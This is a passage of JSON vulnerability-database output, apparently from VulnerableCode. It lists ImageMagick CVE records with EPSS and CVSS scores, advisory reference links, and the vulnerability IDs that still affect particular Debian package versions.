"epss", "scoring_elements": "0.23391", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23337", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23354", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23348", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23328", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23136", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27753" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27753", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27753" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894229", "reference_id": "1894229", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894229" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27753" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t2pe-etah-1bh3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82430?format=api", "vulnerability_id": "VCID-tc3z-912z-afc8", "summary": "ImageMagick: division by zero in RemoveDuplicateLayers in MagickCore/layer.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13454.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13454.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0035", "scoring_system": "epss", "scoring_elements": "0.57483", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00357", "scoring_system": "epss", "scoring_elements": "0.57883", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00357", "scoring_system": "epss", "scoring_elements": "0.57968", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00357", "scoring_system": "epss", "scoring_elements": "0.57986", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00357", "scoring_system": "epss", "scoring_elements": "0.57962", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00357", "scoring_system": "epss", "scoring_elements": "0.58018", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00357", "scoring_system": "epss", "scoring_elements": "0.5802", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00357", "scoring_system": "epss", "scoring_elements": "0.58037", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00357", "scoring_system": "epss", "scoring_elements": "0.58015", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00357", "scoring_system": "epss", "scoring_elements": "0.57995", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00357", "scoring_system": "epss", "scoring_elements": "0.58025", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00357", "scoring_system": "epss", "scoring_elements": "0.58024", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00357", "scoring_system": "epss", "scoring_elements": "0.58001", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1728474", "reference_id": "1728474", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1728474" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931740", "reference_id": "931740", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931740" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": 